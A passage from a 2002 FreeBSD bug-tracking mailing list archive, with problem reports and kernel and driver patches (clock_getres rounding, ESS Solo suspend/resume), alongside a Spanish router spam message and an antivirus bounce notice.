from /modules /Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 15:22: 0 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0F7B37B400; Mon, 19 Aug 2002 15:21:56 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 82C8E43E6E; Mon, 19 Aug 2002 15:21:56 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JMLuJU084935; Mon, 19 Aug 2002 15:21:56 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JMLusv084931; Mon, 19 Aug 2002 15:21:56 -0700 (PDT) Date: Mon, 19 Aug 2002 15:21:56 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208192221.g7JMLusv084931@freefall.freebsd.org> To: keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/41569: silo overflow Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: silo overflow Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Mon Aug 19 15:20:55 PDT 2002 Responsible-Changed-Why: Refile PR under i386/ category. This is similar to i386/26261 but not quite the same. http://www.freebsd.org/cgi/query-pr.cgi?pr=41569 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 15:37:22 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 37B1837B400 for ; Mon, 19 Aug 2002 15:37:17 -0700 (PDT) Received: from telus-uu.net (be3h4c-honolulu.hawaii.cable-rr.com [63.127.192.142]) by mx1.FreeBSD.org (Postfix) with SMTP id 5D06543E6A for ; Mon, 19 Aug 2002 15:37:13 -0700 (PDT) (envelope-from mailer@telus-uu.net) From: "Net Solutions" To: "Bugs" Subject: Nuevo Ruteador Linksys con Net2Phone Date: Mon, 19 Aug 2002 17:35:59 -0500 MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal Message-ID: <672796131462770@telus-uu.net> Reply-To: "Net Solutions" Organization: Net Solutions X-Mailer: Internet Mail Service Content-Type: multipart/alternative; boundary="----_NextPart_729700897208794" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------_NextPart_729700897208794 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: QUOTED-PRINTABLE =A1Nuevo Ruteador Linksys con Net2Phone! Ahora podr=E1 disfrutar de las grandes ventajas de un ruteador Linksys m=E1s la posibilidad de hacer llamadas telef=F3nicas a trav=E9s de =E9l con Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales. Si ya cuenta con el servicio ADSL o bien conocido como Prodigy Infinitum de Telmex, el Ruteador Linksys EtherFast Cable/DSL es la opci=F3n perfecta para que m=FAltiples computadoras dentro de su red naveguen el Internet a una gran velocidad, permitiendo conectar hasta 253 usuarios. Con su tecnolog=EDa de ruteo, la navegaci=F3n ser=E1 mucho m=E1s eficiente y mucho m=E1s r=E1pida que por el m=E9todo convencional de compartir el Internet a trav=E9s de software. =A1GARANTIZADO! Si a=FAn no cuenta con el servicio de Prodigy Infinitum visite: http://www.telmex.com/internos/infinitum/info/ Sus funciones incluyen: Tecnolog=EDa NAT que act=FAa como un firewall para proteger su red interna contra hackers y usuarios no autorizados. El administrador puede bloquear usuarios internos espec=EDficos, filtrando servicios permitidos para Internet. Act=FAa como servidor DHCP para su red existente. Ruteo de puertos para direccionar peticiones externas a una computadora interna especifica dentro de su red. y muchas funciones m=E1s! Y ahora con el nuevo equipo Linksys Router + VOICE de Net2Phone Es tan sencillo como conectar un tel=E9fono ordinario a la parte posterior del ruteador y sus llamadas ser=E1n enrutadas por Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales. No requiere de tener su computadora prendida para efectuar llamadas, y puede agregar su l=EDnea telef=F3nica de Net2Phone a su conmutador telef=F3nico. Visite esta p=E1gina para adquirir el ruteador Linksys http://www.netsolutions.com.mx/servicios/ADSL/adsl.shtml Si desea conocer las tarifas de net2Phone d=E9 click aqu=ED Net Solutions Tel: +52(55)5148-9888 Fax: +52(55)5148-9895 E-mail: info@netsolutions.com.mx http://www.netsolutions.com.mx Para ser removido de la lista da click aqu=ED. ------_NextPart_729700897208794 Content-Type: text/html; charset="ISO-8859-1" Content-Transfer-Encoding: QUOTED-PRINTABLE

 3D""=A1Nuevo Ruteador Linksys con Net2Phone!

Ahora podr=E1 disfrutar de las grandes ventajas de un ruteador Linksys m=E1s la posibilidad de hacer llamadas telef=F3nicas a trav=E9s de =E9l con Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales.

Si ya cuenta con el servicio ADSL o bien conocido como Prodigy Infinitum de Telmex, el Ruteador Linksys EtherFast Cable/DSL es la opci=F3n perfecta para que m=FAltiples computadoras dentro de su red naveguen el Internet a una gran velocidad, permitiendo conectar hasta 253 usuarios.

Con su tecnolog=EDa de ruteo, la navegaci=F3n ser=E1 mucho m=E1s eficiente y mucho m=E1s r=E1pida que por el m=E9todo convencional de compartir el Internet a trav=E9s de software. =A1GARANTIZADO!

Si a=FAn no cuenta con el servicio de Prodigy Infinitum visite:
http://www.telmex.com/internos/infinitum/info/

Sus funciones incluyen:

  • Tecnolog=EDa NAT que act=FAa como un firewall para proteger su red interna contra hackers y usuarios no autorizados.
  • El administrador puede bloquear usuarios internos espec=EDficos, filtrando servicios permitidos para Internet.
  • Act=FAa como servidor DHCP para su red existente.
  • Ruteo de puertos para direccionar peticiones externas a una computadora interna especifica dentro de su red.
  • y muchas funciones m=E1s!

3D""Y ahora con el nuevo equipo Linksys Router + VOICE de Net2Phone

  • Es tan sencillo como conectar un tel=E9fono ordinario a la parte posterior del ruteador y sus llamadas ser=E1n enrutadas por Net2Phone para as=ED reducir significativamente sus costos en llamadas internacionales.
  • No requiere de tener su computadora prendida para efectuar llamadas, y puede agregar su l=EDnea telef=F3nica de Net2Phone a su conmutador telef=F3nico.

Visite esta p=E1gina para adquirir el ruteador Linksys
http://www.netsolutions.com.mx/servicios/ADSL/adsl.shtml

Si desea conocer las tarifas de net2Phone d=E9 click aqu=ED

Net Solutions
Tel: +52(55)5148-9888
Fax: +52(55)5148-9895
E-mail: info@netsolutions.com.mx
http://www.netsolutions.com.mx

 

Para ser removido de la lista da click aqu=ED.

 ------_NextPart_729700897208794-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 15:50: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 062CE37B400 for ; Mon, 19 Aug 2002 15:50:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5962543E75 for ; Mon, 19 Aug 2002 15:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JMo1JU089036 for ; Mon, 19 Aug 2002 15:50:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JMo1IB089035; Mon, 19 Aug 2002 15:50:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8400237B400 for ; Mon, 19 Aug 2002 15:48:37 -0700 (PDT) Received: from mailout10.sul.t-online.com (mailout10.sul.t-online.com [194.25.134.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9342243E75 for ; Mon, 19 Aug 2002 15:48:36 -0700 (PDT) (envelope-from oliver@kobo.de) Received: from fwd05.sul.t-online.de by mailout10.sul.t-online.com with smtp id 17gvK7-0003vR-03; Tue, 20 Aug 2002 00:48:35 +0200 Received: from kim.eu.kobo.de (520030847883-0001@[80.142.46.191]) by fmrl05.sul.t-online.com with esmtp id 17gvJy-1yDxmyC; Tue, 20 Aug 2002 00:48:26 +0200 Received: from orange.eu.kobo.de (orange.eu.kobo.de [192.168.2.34]) by kim.eu.kobo.de (8.12.2/8.12.2) with ESMTP id g7JMmPMg011183 for ; Tue, 20 Aug 2002 00:48:25 +0200 (CEST) (envelope-from oliver@orange.eu.kobo.de) Received: from orange.eu.kobo.de (localhost [127.0.0.1]) by orange.eu.kobo.de (8.12.5/8.12.3) with ESMTP id g7JMmPDU004399 for ; Tue, 20 Aug 2002 00:48:25 +0200 (CEST) (envelope-from oliver@orange.eu.kobo.de) Received: (from oliver@localhost) by orange.eu.kobo.de (8.12.5/8.12.5/Submit) id g7JMmOJC004398; Tue, 20 Aug 2002 00:48:24 +0200 (CEST) Message-Id: <200208192248.g7JMmOJC004398@orange.eu.kobo.de> Date: Tue, 20 Aug 2002 00:48:24 +0200 (CEST) From: Oliver Schneider Reply-To: Oliver Schneider To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/41802: Support for T-Sinus 130 pccard (german vendor) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41802 >Category: misc >Synopsis: Support for T-Sinus 130 pccard (german vendor) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Aug 19 15:50:00 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Oliver Schneider >Release: FreeBSD 4.6-STABLE i386 >Organization: none >Environment: System: FreeBSD orange.eu.kobo.de 4.6-STABLE FreeBSD 4.6-STABLE #0: Wed Aug 14 02:33:38 CEST 2002 root@orange.eu.kobo.de:/usr/obj/usr/src/sys/ORANGE i386 Laptop Siemens-Fujitsu AMD K6-2 350 >Description: Support in /etc/defaults/pccard.conf for T-Sinus 130card >How-To-Repeat: no bug, no fix >Fix: please add this to /etc/defaults/pccard.conf. The german "Deutsche Telekom" offer this WLAN set. best regards Oliver # German Telekom T-Sinus 130card, unknown original manufactor # supported revisions: maybe all # NOT supported revisions: n.a. card "T-Sinus" "130card" iconfig auto "wi" ? 0x10000 insert /etc/pccard_ether $device start remove /etc/pccard_ether $device stop >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 16:17:44 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BB50337B400; Mon, 19 Aug 2002 16:17:41 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 674DC43E4A; Mon, 19 Aug 2002 16:17:41 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JNHfJU098801; Mon, 19 Aug 2002 16:17:41 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JNHfw5098797; Mon, 19 Aug 2002 16:17:41 -0700 (PDT) Date: Mon, 19 Aug 2002 16:17:41 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208192317.g7JNHfw5098797@freefall.freebsd.org> To: knotwell@ix.netcom.com, keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/41512: crash dump during TCP operations Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Old Synopsis: New Synopsis: crash dump during TCP operations State-Changed-From-To: open->closed State-Changed-By: keramida State-Changed-When: Mon Aug 19 16:13:03 PDT 2002 State-Changed-Why: This has already been fixed AFAIK. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Mon Aug 19 16:13:03 PDT 2002 Responsible-Changed-Why: Misfiled PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=41512 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 16:40:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0ECD637B400 for ; Mon, 19 Aug 2002 16:40:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 87A2B43E6A for ; Mon, 19 Aug 2002 16:40:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JNe8JU002766 for ; Mon, 19 Aug 2002 16:40:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JNe7CB002764; Mon, 19 Aug 2002 16:40:07 -0700 (PDT) Date: Mon, 19 Aug 2002 16:40:07 -0700 (PDT) Message-Id: <200208192340.g7JNe7CB002764@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: kern/41781: clock_getres returns tv_nsec=0 when TSC is 1Ghz or faster Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41781; it has been noted by GNATS. From: Bruce Evans To: Kevin Martin Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/41781: clock_getres returns tv_nsec=0 when TSC is 1Ghz or faster Date: Tue, 20 Aug 2002 09:41:31 +1000 (EST) On Mon, 19 Aug 2002, Kevin Martin wrote: > >Description: > When the the TSC timer is 1Ghz or faster: > Timecounter "TSC" frequency 1002275326 Hz > kern/kern_time.c handles clock_getres by dividing this value into > 1000000000L. The integer result is unfortunately zero. Programs > which expect a useful result are disappointed. For example, PGP uses > this value and divides by it, promptly dumping core. I just wrote the following untested fix for this. %%% Index: kern_time.c =================================================================== RCS file: /home/ncvs/src/sys/kern/kern_time.c,v retrieving revision 1.84 diff -u -2 -r1.84 kern_time.c --- kern_time.c 18 Aug 2002 21:24:22 -0000 1.84 +++ kern_time.c 19 Aug 2002 20:45:17 -0000 @@ -215,5 +209,10 @@ if (SCARG(uap, tp)) { ts.tv_sec = 0; - ts.tv_nsec = 1000000000 / tc_getfrequency(); + /* + * Round up the result of the division cheaply by adding 1. + * Rounding up is especially important if rounding down + * would give 0. Perfect rounding is unimportant. + */ + ts.tv_nsec = 1000000000 / tc_getfrequency() + 1; error = copyout(&ts, SCARG(uap, tp), sizeof(ts)); } %%% > >Fix: > I believe the best solution is to return a minimum value of one > nanosecond, since the worst you've done is tell the calling program > that the timer is less precise than it is. Does POSIX have anything > to say? I don't know. It doesn't say anything relevant, at least in POSIX.1-200x-draft7. It says that clock_getres() gives the actual resolution, but this is clearly unimplementable if the actual resolution is less than one nanosecond or even if it is not an integral number of nanoseconds. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 17:12: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C452737B408; Mon, 19 Aug 2002 17:12:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E6B6543E77; Mon, 19 Aug 2002 17:10:32 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7K0ATJU013272; Mon, 19 Aug 2002 17:10:29 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7K0ATkV013268; Mon, 19 Aug 2002 17:10:29 -0700 (PDT) Date: Mon, 19 Aug 2002 17:10:29 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208200010.g7K0ATkV013268@freefall.freebsd.org> To: tom@FreeBSD.org, keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41346: Re: fix lukemftpd man page: /etc/nologin -> /var/run/nologin Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Re: fix lukemftpd man page: /etc/nologin -> /var/run/nologin State-Changed-From-To: open->closed State-Changed-By: keramida State-Changed-When: Mon Aug 19 17:09:47 PDT 2002 State-Changed-Why: Followup to misc/41149 misfiled as a new PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Mon Aug 19 17:09:47 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=41346 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 17:34:47 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A42F437B400; Mon, 19 Aug 2002 17:34:44 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 50DBF43E42; Mon, 19 Aug 2002 17:34:44 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7K0YiJU018976; Mon, 19 Aug 2002 17:34:44 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7K0YZ7G018966; Mon, 19 Aug 2002 17:34:35 -0700 (PDT) Date: Mon, 19 Aug 2002 17:34:35 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208200034.g7K0YZ7G018966@freefall.freebsd.org> To: borjafp@vivirasturias.com, keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/40939: kern/040893: www.vivirasturias.com/dmesg Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kern/040893: www.vivirasturias.com/dmesg State-Changed-From-To: open->closed State-Changed-By: keramida State-Changed-When: Mon Aug 19 17:33:58 PDT 2002 State-Changed-Why: Folloup to kern/40893 misfiled as a new PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Mon Aug 19 17:33:58 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=40939 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 18: 7:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D9BBF37B400; Mon, 19 Aug 2002 18:07:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 87ADA43E6E; Mon, 19 Aug 2002 18:07:14 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7K17EJU028721; Mon, 19 Aug 2002 18:07:14 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7K17ENV028717; Mon, 19 Aug 2002 18:07:14 -0700 (PDT) Date: Mon, 19 Aug 2002 18:07:14 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208200107.g7K17ENV028717@freefall.freebsd.org> To: jmallett@FreeBSD.org, keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/41073: Re: added .warning in make(1) + two fixes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Re: added .warning in make(1) + two fixes State-Changed-From-To: open->closed State-Changed-By: keramida State-Changed-When: Mon Aug 19 18:06:40 PDT 2002 State-Changed-Why: Followup to bin/41070 misfiled as a new PR. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Mon Aug 19 18:06:40 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=41073 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 0:17:30 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 993D237B401 for ; Tue, 20 Aug 2002 00:17:28 -0700 (PDT) Received: from gw.pap.pl (gw.pap.net.pl [195.94.197.131]) by mx1.FreeBSD.org (Postfix) with SMTP id 5AB1F43E4A for ; Tue, 20 Aug 2002 00:17:27 -0700 (PDT) (envelope-from ) Received: from poczta.paponline.com.pl ([10.10.0.201]) by gw.pap.pl; Tue, 20 Aug 2002 09:07:26 +0200 (CEST) Received: from trend ([10.10.0.50]) by mx.pap.com.pl (Netscape Messaging Server 4.15) with SMTP id H14RSD00.71V for ; Tue, 20 Aug 2002 09:07:25 +0200 Date: Tue, 20 Aug 2002 09:09:48 +0200 From: admin@pap.pl To: Subject: InterScan NT Alert Message-Id: <20020820071727.5AB1F43E4A@mx1.FreeBSD.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sender, InterScan has detected virus(es) in your e-mail attachment. Date: Tue, 20 Aug 2002 09:09:48 +0200 Method: Mail From: To: File: main[1].scr Action: clean failed - deleted Virus: WORM_KLEZ.H To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 0:30:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 869DD37B405 for ; Tue, 20 Aug 2002 00:30:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C1E3643E6E for ; Tue, 20 Aug 2002 00:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7K7U2JU021511 for ; Tue, 20 Aug 2002 00:30:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7K7U2Xm021510; Tue, 20 Aug 2002 00:30:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7202037B401 for ; Tue, 20 Aug 2002 00:25:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DF67243E6E for ; Tue, 20 Aug 2002 00:25:04 -0700 (PDT) (envelope-from takawata@FreeBSD.org) Received: from freefall.freebsd.org (takawata@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7K7P4JU021254 for ; Tue, 20 Aug 2002 00:25:04 -0700 (PDT) (envelope-from takawata@freefall.freebsd.org) Received: (from takawata@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7K7P4HU021253; Tue, 20 Aug 2002 00:25:04 -0700 (PDT) Message-Id: <200208200725.g7K7P4HU021253@freefall.freebsd.org> Date: Tue, 20 Aug 2002 00:25:04 -0700 (PDT) From: Takanori Watanabe Reply-To: Takanori Watanabe To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41809: ESS solo cannot be used after suspend Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41809 >Category: kern >Synopsis: ESS solo cannot be used after suspend >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 00:30:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Takanori Watanabe >Release: FreeBSD 4.6-STABLE i386 >Organization: freebsd.org >Environment: System: FreeBSD dnk.axe-inc.co.jp 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Sat Jul 27 14:58:32 JST 2002 >Description: ESS solo cannot be used after resume due to lack of suspend/resume code. >How-To-Repeat: Go sleeping by acpiconf -s 3 or apm -z then resume. >Fix: Note that the process opening the device still get wrong after resume. The ess_suspend routine may used to solve the problem, I think. Index: solo.c =================================================================== RCS file: /home/ncvs/src/sys/dev/sound/pci/solo.c,v retrieving revision 1.23 diff -u -r1.23 solo.c --- solo.c 8 Oct 2001 05:56:56 -0000 1.23 +++ solo.c 20 Aug 2002 07:21:30 -0000 @@ -896,7 +896,41 @@ #define PCI_LEGACYCONTROL 0x40 #define PCI_CONFIG 0x50 #define PCI_DDMACONTROL 0x60 +static int +ess_suspend(device_t dev) +{ + return 0; +} +static int +ess_resume(device_t dev) +{ + uint16_t ddma; + uint32_t data; + struct ess_info *sc = pcm_getdevinfo(dev); + + data = pci_read_config(dev, PCIR_COMMAND, 2); + data |= PCIM_CMD_PORTEN | PCIM_CMD_BUSMASTEREN; + pci_write_config(dev, PCIR_COMMAND, data, 2); + data = pci_read_config(dev, PCIR_COMMAND, 2); + + ddma = rman_get_start(sc->vc) | 1; + pci_write_config(dev, PCI_LEGACYCONTROL, 0x805f, 2); + pci_write_config(dev, PCI_DDMACONTROL, ddma, 2); + pci_write_config(dev, PCI_CONFIG, 0, 2); + if (ess_reset_dsp(sc)) + goto no; + if (mixer_reinit(dev)) + goto no; + if (sc->newspeed) + ess_setmixer(sc, 0x71, 0x2a); + + port_wr(sc->io, 0x7, 0xb0, 1); /* enable irqs */ + + return 0; + no: + return EIO; +} static int ess_attach(device_t dev) { @@ -996,8 +1030,8 @@ DEVMETHOD(device_probe, ess_probe), DEVMETHOD(device_attach, ess_attach), DEVMETHOD(device_detach, ess_detach), - DEVMETHOD(device_resume, bus_generic_resume), - DEVMETHOD(device_suspend, bus_generic_suspend), + DEVMETHOD(device_resume, ess_resume), + DEVMETHOD(device_suspend, ess_suspend), { 0, 0 } }; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 3:44:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 65F1437B400; Tue, 20 Aug 2002 03:44:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1919243E4A; Tue, 20 Aug 2002 03:44:12 -0700 